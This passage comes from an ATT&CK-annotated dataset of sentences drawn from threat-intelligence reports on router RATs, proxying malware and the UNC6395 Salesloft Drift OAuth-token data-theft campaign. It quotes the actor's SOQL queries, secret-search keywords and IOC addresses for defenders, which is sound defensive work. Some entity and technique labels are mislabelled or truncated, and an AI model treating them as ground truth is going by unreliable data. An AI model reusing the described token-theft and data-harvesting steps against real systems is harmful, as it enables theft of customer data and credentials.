"mandiant-38_mandiant_report-p1-s53-fa7ee1", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 53, "context_before": "Posted in\nThreat Intelligence\nRelated articles\nThreat Intelligence\nGTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\nZuoRAT | In June 2023, Lumen’s Black Lotus Labs described a multi-stage remote access Trojan (RAT) dubbed \"ZuoRAT\" that it observed exploiting known vulnerabilities affecting Asus, Cisco, DrayTek, and Netgear SOHO routers throughout North America and Europe.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "ZuoRAT exploits known vulnerabilities in SOHO routers.", "entities": [ { "text": "ZuoRAT", "label": "MalwareTool", "start": 242, "end": 248 }, { "text": "exploiting known vulnerabilities affecting Asus, Cisco, DrayTek, and Netgear SOHO routers", "label": "Action", "start": 267, "end": 356 } ] }, { "uid": "mandiant-38_mandiant_report-p1-s54-807b91", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 54, "context_before": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\nZuoRAT | In June 2023, Lumen’s Black Lotus Labs described a multi-stage remote access Trojan (RAT) dubbed \"ZuoRAT\" that it observed exploiting known vulnerabilities affecting Asus, Cisco, DrayTek, and Netgear SOHO routers throughout North America and Europe.", "sentence_text": "The researchers also claim to have identified infected routers acting as proxy C2 nodes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s55-337477", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 55, "context_before": "The researchers also claim to have identified infected routers acting as proxy C2 nodes.", "sentence_text": "EYEWELL | EYEWELL, malware we have seen TEMP.Overboard deploy primarily against Taiwanese government and technology targets, contains a passive proxy capability that can be used to relay traffic from other systems infected with EYEWELL within a victim environment.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.001", "name": "Internal Proxy" } ], "procedure": "deploy malware with proxy capability to relay internal traffic", "entities": [ { "text": "EYEWELL", "start": 10, "end": 17, "label": "MalwareTool" }, { "text": "EYEWELL", "start": 0, "end": 7, "label": "MalwareTool" }, { "text": "malware", "start": 19, "end": 26, "label": "MalwareTool" }, { "text": " TEMP.Overboard", "start": 39, "end": 54, "label": "ThreatActor" }, { "text": " deploy", "start": 54, "end": 61, "label": "Action" }, { "text": "Taiwanese government", "start": 80, "end": 100, "label": "Infrastructure_Indicator" }, { "text": "technology targets", "start": 105, "end": 123, "label": "Infrastructure_Indicator" }, { "text": "passive proxy capability", "start": 136, "end": 160, "label": "MalwareTool" }, { "text": "relay traffic ", "start": 181, "end": 195, "label": "Action" }, { "text": "EYEWELL", "start": 228, "end": 235, "label": "MalwareTool" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s56-610e1a", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 56, "context_before": "EYEWELL | EYEWELL, malware we have seen TEMP.Overboard deploy primarily against Taiwanese government and technology targets, contains a passive proxy capability that can be used to relay traffic from other systems infected with EYEWELL within a victim environment.", "sentence_text": "Notably, Mandiant reported that a TEMP.Overboard malware identified in 2019 that shared similarities with EYEWELL also included functionality customized to disable part of the process listing and network functionality of an endpoint security product.\nHYPERBRO and FOCUSFJORD | In an analysis of UNC215 intrusions against Middle Eastern and Central Asian targets in 2019 and 2020, Mandiant noted evidence that UNC215 made technical modifications to HYPERBRO and FOCUSFJORD to incorporate the ability to act as proxies and relay communications to their C2 servers, likely to minimize the risk of detection and blend in with normal network traffic.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "modified malware to act as proxies and relay C2 communications; disable endpoint security", "entities": [ { "text": " TEMP.Overboard ", "start": 33, "end": 49, "label": "ThreatActor" }, { "text": "malware", "start": 49, "end": 56, "label": "MalwareTool" }, { "text": "EYEWELL ", "start": 106, "end": 114, "label": "MalwareTool" }, { "text": "disable", "start": 156, "end": 163, "label": "Action" }, { "text": " endpoint security product", "start": 223, "end": 249, "label": "Infrastructure_Indicator" }, { "text": "HYPERBRO", "start": 251, "end": 259, "label": "MalwareTool" }, { "text": " FOCUSFJORD ", "start": 263, "end": 275, "label": "MalwareTool" }, { "text": "UNC215", "start": 295, "end": 301, "label": "ThreatActor" }, { "text": " Middle Eastern and Central Asian targets", "start": 320, "end": 361, "label": "Infrastructure_Indicator" }, { "text": "UNC215 ", "start": 409, "end": 416, "label": "ThreatActor" }, { "text": " HYPERBRO", "start": 447, "end": 456, "label": "MalwareTool" }, { "text": "FOCUSFJORD", "start": 461, "end": 471, "label": "MalwareTool" }, { "text": "incorporate", "start": 475, "end": 486, "label": "Action" }, { "text": " relay communications", "start": 520, "end": 541, "label": "Action" }, { "text": "C2 servers", "start": 551, "end": 561, "label": "Infrastructure_Indicator" }, { "text": " minimize the risk of detection", "start": 572, "end": 603, "label": "Action" }, { "text": " blend in ", "start": 607, "end": 617, "label": "Action" } ] }, { "uid": "mandiant-39_mandiant_report-p1-s1-f05851", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Written by: Austin Larsen, Matt Lin, Tyler McLellan, Omar ElAhdan Update (August 28)\nBased on new information identified by GTIG, the scope of this compromise is not exclusive to the Salesforce integration with Salesloft Drift and impacts other integrations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s2-1a1f9a", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "Written by: Austin Larsen, Matt Lin, Tyler McLellan, Omar ElAhdan Update (August 28)\nBased on new information identified by GTIG, the scope of this compromise is not exclusive to the Salesforce integration with Salesloft Drift and impacts other integrations.", "sentence_text": "We now advise all Salesloft Drift customers to treat any and all authentication tokens stored in or connected to the Drift platform as potentially compromised On August 28, 2025, our investigation confirmed that the actor also compromised OAuth tokens for the \"Drift Email\" integration.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1528", "name": "Steal Application Access Token" } ], "procedure": "compromised OAuth tokens for email integration", "entities": [ { "text": "OAuth tokens", "start": 239, "end": 251, "label": "Infrastructure_Indicator" }, { "text": "Drift Email", "start": 261, "end": 272, "label": "Infrastructure_Indicator" }, { "text": " compromised", "start": 226, "end": 238, "label": "Action" }, { "text": " also ", "start": 221, "end": 227, "label": "ThreatActor" } ] }, { "uid": "mandiant-39_mandiant_report-p1-s3-8c7d32", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "We now advise all Salesloft Drift customers to treat any and all authentication tokens stored in or connected to the Drift platform as potentially compromised On August 28, 2025, our investigation confirmed that the actor also compromised OAuth tokens for the \"Drift Email\" integration.", "sentence_text": "The only accounts that were potentially accessed were those that had been specifically configured to integrate with Salesloft Drift; the actor would not have been able to access any other accounts on a customer's Workspace domain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s4-a24d42", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "The only accounts that were potentially accessed were those that had been specifically configured to integrate with Salesloft Drift; the actor would not have been able to access any other accounts on a customer's Workspace domain.", "sentence_text": "In response to these findings and to protect our customers, Google identified the impacted users, revoked the specific OAuth tokens granted to the Drift Email application, and disabled the integration functionality between Google Workspace and Salesloft Drift pending further investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s5-6e09b2", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "In response to these findings and to protect our customers, Google identified the impacted users, revoked the specific OAuth tokens granted to the Drift Email application, and disabled the integration functionality between Google Workspace and Salesloft Drift pending further investigation.", "sentence_text": "We are notifying all impacted Google Workspace administrators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s6-8091de", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "We are notifying all impacted Google Workspace administrators.", "sentence_text": "To be clear, there has been no compromise of Google Workspace or Alphabet itself.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s7-ca982f", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "To be clear, there has been no compromise of Google Workspace or Alphabet itself.", "sentence_text": "Google has not been a Salesloft Drift customer, and therefore is not impacted.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s8-e4947d", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "Google has not been a Salesloft Drift customer, and therefore is not impacted.", "sentence_text": "Any inquiries regarding potential breach impact should be directed to Salesloft or its customers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s9-bf8a95", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "Any inquiries regarding potential breach impact should be directed to Salesloft or its customers.", "sentence_text": "Salesloft has now engaged Mandiant to assist in their investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s10-e3c176", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "Salesloft has now engaged Mandiant to assist in their investigation.", "sentence_text": "See Salesloft’s updated advisory for more details.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s11-dc3e9b", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "See Salesloft’s updated advisory for more details.", "sentence_text": "Introduction\nGoogle Threat Intelligence Group (GTIG) is issuing an advisory to alert organizations about a widespread data theft campaign, carried out by the actor tracked as UNC6395.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s12-cd6628", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "Introduction\nGoogle Threat Intelligence Group (GTIG) is issuing an advisory to alert organizations about a widespread data theft campaign, carried out by the actor tracked as UNC6395.", "sentence_text": "Beginning as early as Aug. 8, 2025 through at least Aug. 18, 2025, the actor targeted Salesforce customer instances through compromised OAuth tokens associated with the Salesloft Drift third-party application.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552.001", "name": "Credentials In Files" } ], "procedure": "targeted Salesforce instances via compromised OAuth tokens", "entities": [ { "text": "the actor", "start": 67, "end": 76, "label": "ThreatActor" }, { "text": "targeted", "start": 77, "end": 85, "label": "Action" }, { "text": "Salesforce customer instances", "start": 86, "end": 115, "label": "Infrastructure_Indicator" }, { "text": " compromised OAuth tokens", "start": 123, "end": 148, "label": "Infrastructure_Indicator" }, { "text": "Salesloft Drift third-party application", "start": 169, "end": 208, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-39_mandiant_report-p1-s13-d47fce", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "Beginning as early as Aug. 8, 2025 through at least Aug. 18, 2025, the actor targeted Salesforce customer instances through compromised OAuth tokens associated with the Salesloft Drift third-party application.", "sentence_text": "The actor systematically exported large volumes of data from numerous corporate Salesforce instances.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "exported large volumes of data from Salesforce instances", "entities": [ { "text": "The actor ", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": " exported ", "start": 24, "end": 34, "label": "Action" }, { "text": "corporate Salesforce instances", "start": 70, "end": 100, "label": "Infrastructure_Indicator" }, { "text": "data", "start": 51, "end": 55, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-39_mandiant_report-p1-s14-07d78c", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "The actor systematically exported large volumes of data from numerous corporate Salesforce instances.", "sentence_text": "GTIG assesses the primary intent of the threat actor is to harvest credentials.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s15-a1020f", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "GTIG assesses the primary intent of the threat actor is to harvest credentials.", "sentence_text": "After the data was exfiltrated, the actor searched through the data to look for secrets that could be potentially used to compromise victim environments.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552.001", "name": "Credentials In Files" } ], "procedure": "searched exfiltrated data for secrets to enable future compromise", "entities": [ { "text": "exfiltrated", "start": 19, "end": 30, "label": "Action" }, { "text": "the actor", "start": 32, "end": 41, "label": "ThreatActor" }, { "text": "searched", "start": 42, "end": 50, "label": "Action" }, { "text": "look for", "start": 71, "end": 79, "label": "Action" }, { "text": " victim environments", "start": 132, "end": 152, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-39_mandiant_report-p1-s16-7ecf84", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "After the data was exfiltrated, the actor searched through the data to look for secrets that could be potentially used to compromise victim environments.", "sentence_text": "UNC6395 demonstrated operational security awareness by deleting query jobs, however logs were not impacted and organizations should still review relevant logs for evidence of data exposure.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "deleting query jobs", "entities": [ { "text": "UNC6395", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": " deleting query jobs", "start": 54, "end": 74, "label": "Action" } ] }, { "uid": "mandiant-39_mandiant_report-p1-s17-bc712c", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "UNC6395 demonstrated operational security awareness by deleting query jobs, however logs were not impacted and organizations should still review relevant logs for evidence of data exposure.", "sentence_text": "Based on data available at the time, Salesloft indicated that customers that do not integrate with Salesforce are not impacted by this campaign.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s18-52d72a", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "Based on data available at the time, Salesloft indicated that customers that do not integrate with Salesforce are not impacted by this campaign.", "sentence_text": "In addition, Salesforce removed the Drift application from the Salesforce AppExchange until further notice pending further investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s19-22dd43", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "In addition, Salesforce removed the Drift application from the Salesforce AppExchange until further notice pending further investigation.", "sentence_text": "This issue does not stem from a vulnerability within the core Salesforce platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s20-965927", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 20, "context_before": "This issue does not stem from a vulnerability within the core Salesforce platform.", "sentence_text": "GTIG, Salesforce, and Salesloft have notified impacted organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s21-033da5", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 21, "context_before": "GTIG, Salesforce, and Salesloft have notified impacted organizations.", "sentence_text": "Threat Detail\nThe threat actor executed queries to retrieve information associated with Salesforce objects such as Cases, Accounts, Users, and Opportunities.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "executed queries to retrieve Salesforce object data", "entities": [ { "text": " threat actor ", "start": 17, "end": 31, "label": "ThreatActor" }, { "text": "executed ", "start": 31, "end": 40, "label": "Action" }, { "text": " retrieve information", "start": 50, "end": 71, "label": "Action" }, { "text": "alesforce objects", "start": 89, "end": 106, "label": "Infrastructure_Indicator" }, { "text": "Cases, Accounts, Users, and Opportunities", "start": 115, "end": 156, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-39_mandiant_report-p1-s22-c86e48", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "Threat Detail\nThe threat actor executed queries to retrieve information associated with Salesforce objects such as Cases, Accounts, Users, and Opportunities.", "sentence_text": "For example, the threat actor ran the following sequence of queries to get a unique count from each of the associated Salesforce objects.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "ran queries to get unique counts from Salesforce objects", "entities": [ { "text": "threat actor", "start": 17, "end": 29, "label": "ThreatActor" }, { "text": "ran", "start": 30, "end": 33, "label": "Action" }, { "text": "queries", "start": 60, "end": 67, "label": "Action" }, { "text": "Salesforce objects", "start": 118, "end": 136, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-39_mandiant_report-p1-s23-de07c0", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "For example, the threat actor ran the following sequence of queries to get a unique count from each of the associated Salesforce objects.", "sentence_text": "SELECT COUNT() FROM Account;\nSELECT COUNT() FROM Opportunity;\nSELECT COUNT() FROM User;\nSELECT COUNT() FROM Case;\nQuery to Retrieve User Data", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s24-0dcc3f", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "SELECT COUNT() FROM Account;\nSELECT COUNT() FROM Opportunity;\nSELECT COUNT() FROM User;\nSELECT COUNT() FROM Case;\nQuery to Retrieve User Data", "sentence_text": "SELECT Id, IsDeleted, MasterRecordId, CaseNumber FROM Case LIMIT 10000 Recommendations Given GTIG's observations of data exfiltration associated with the campaign, organizations using Salesloft Drift to integrate with third-party platforms (including but not limited to Salesforce) should consider their data compromised and are urged to take immediate remediation steps.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s25-3a0cdf", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "SELECT Id, IsDeleted, MasterRecordId, CaseNumber FROM Case LIMIT 10000 Recommendations Given GTIG's observations of data exfiltration associated with the campaign, organizations using Salesloft Drift to integrate with third-party platforms (including but not limited to Salesforce) should consider their data compromised and are urged to take immediate remediation steps.", "sentence_text": "Impacted organizations should search for sensitive information and secrets contained within the integrated platforms and take appropriate action, such as revoking API keys, rotating credentials, and performing further investigation to determine if the secrets were abused by the threat actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s26-99eb5b", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 26, "context_before": "Impacted organizations should search for sensitive information and secrets contained within the integrated platforms and take appropriate action, such as revoking API keys, rotating credentials, and performing further investigation to determine if the secrets were abused by the threat actor.", "sentence_text": "Investigate for Compromise and Scan for Exposed Secrets Review all third-party integrations associated with an organization's Drift instance (accessible within the Drift Admin settings page).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s27-7b3f9c", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "Investigate for Compromise and Scan for Exposed Secrets Review all third-party integrations associated with an organization's Drift instance (accessible within the Drift Admin settings page).", "sentence_text": "Within each integrated third-party application, search for the IP addresses and User-Agent strings provided in the IOCs section below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s28-3ecc7d", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "Within each integrated third-party application, search for the IP addresses and User-Agent strings provided in the IOCs section below.", "sentence_text": "While this list includes IPs from the Tor network that have been observed to date, Mandiant recommends a broader search for any activity originating from Tor exit nodes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s29-51a99d", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 29, "context_before": "While this list includes IPs from the Tor network that have been observed to date, Mandiant recommends a broader search for any activity originating from Tor exit nodes.", "sentence_text": "Review Salesforce Event Monitoring logs for unusual activity associated with the Drift connection user.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s30-b2cd3d", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "Review Salesforce Event Monitoring logs for unusual activity associated with the Drift connection user.", "sentence_text": "Review authentication activity from the Drift Connected App.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s31-c89ed3", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "Review authentication activity from the Drift Connected App.", "sentence_text": "Review UniqueQuery events that log executed SOQL queries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s32-997c68", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "Review UniqueQuery events that log executed SOQL queries.", "sentence_text": "Open a Salesforce support case to obtain specific queries used by the threat actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s33-217d85", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "Open a Salesforce support case to obtain specific queries used by the threat actor.", "sentence_text": "Search Salesforce objects for potential secrets, such as:\nAKIA\nfor long-term AWS access key identifiers Snowflake or snowflakecomputing.com for Snowflake credentials password , secret,key to find potential references to credential material Strings related to organization-specific login URLs, such as VPN or SSO login pages Run tools like Trufflehog to find secrets and hardcoded credentials.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s34-305da0", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 34, "context_before": "Search Salesforce objects for potential secrets, such as:\nAKIA\nfor long-term AWS access key identifiers Snowflake or snowflakecomputing.com for Snowflake credentials password , secret,key to find potential references to credential material Strings related to organization-specific login URLs, such as VPN or SSO login pages Run tools like Trufflehog to find secrets and hardcoded credentials.", "sentence_text": "and authentication tokens associated with third-party application integrations with a Drift instance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s35-442ff8", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 35, "context_before": "and authentication tokens associated with third-party application integrations with a Drift instance.", "sentence_text": "Immediately revoke and rotate any discovered keys or secrets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s36-b396ae", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 36, "context_before": "Immediately revoke and rotate any discovered keys or secrets.", "sentence_text": "Reset passwords for associated user accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s37-779b91", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "Reset passwords for associated user accounts.", "sentence_text": "For Salesforce integrations, configure session timeout values in Session Settings to limit the lifespan of a compromised session.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s38-afc934", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "For Salesforce integrations, configure session timeout values in Session Settings to limit the lifespan of a compromised session.", "sentence_text": "Harden Access Controls Review and Restrict Connected App Scopes:\nEnsure that applications have the minimum necessary permissions and avoid overly permissive scopes like full access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s39-dee716", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "Harden Access Controls Review and Restrict Connected App Scopes:\nEnsure that applications have the minimum necessary permissions and avoid overly permissive scopes like full access.", "sentence_text": "Enforce IP Restrictions on the Connected App:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s40-b4a16a", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 40, "context_before": "Enforce IP Restrictions on the Connected App:", "sentence_text": "In the app's settings, set the \"IP Relaxation\" policy to \"Enforce IP restrictions.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s41-2261dd", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "In the app's settings, set the \"IP Relaxation\" policy to \"Enforce IP restrictions.\"", "sentence_text": "Define Login IP Ranges:\nOn user profiles, define IP ranges to only allow access from trusted networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s42-06ee57", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 42, "context_before": "Define Login IP Ranges:\nOn user profiles, define IP ranges to only allow access from trusted networks.", "sentence_text": "Remove the \"API Enabled\" Permission : Remove the \"API Enabled\" permission from profiles and grant it only to authorized users via a Permission Set.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s43-3386df", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 43, "context_before": "Remove the \"API Enabled\" Permission : Remove the \"API Enabled\" permission from profiles and grant it only to authorized users via a Permission Set.", "sentence_text": "IOCs\nThe following indicators of compromise are available in a Google Threat Intelligence (GTI) collection for registered users Posted in Threat Intelligence Related articles Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s44-5cda1f", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 44, "context_before": "IOCs\nThe following indicators of compromise are available in a Google Threat Intelligence (GTI) collection for registered users Posted in Threat Intelligence Related articles Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read Threat Intelligence Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace By Google Threat Intelligence Group • 7-minute read Threat Intelligence To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER By Google Threat Intelligence Group • 12-minute read [FILTERED_TABLES_START]\n208.68.36.90 | DigitalOcean 44.215.108.109 | Amazon Web Services 154.41.95.2", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-39_mandiant_report-p1-s45-4e4aee", "source": "mandiant", "doc_id": "39_mandiant_report", "page_number": 1, "sentence_id": 45, "context_before": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read Threat Intelligence Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace By Google Threat Intelligence Group • 7-minute read Threat Intelligence To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER By Google Threat Intelligence Group • 12-minute read [FILTERED_TABLES_START]\n208.68.36.90 | DigitalOcean 44.215.108.109 | Amazon Web Services 154.41.95.2", "sentence_text": "| Tor exit node 176.65.149.100 | Tor exit node 179.43.159.198 | Tor exit node 185.130.47.58 | Tor exit node 185.207.107.130 | Tor exit node 185.220.101.133 | Tor exit node 185.220.101.143 | Tor exit node 185.220.101.164 | Tor exit node 185.220.101.167 | Tor exit node 185.220.101.169 | Tor exit node 185.220.101.180 | Tor exit node 185.220.101.185 | Tor exit node 185.220.101.33 | Tor exit node 192.42.116.179 | Tor 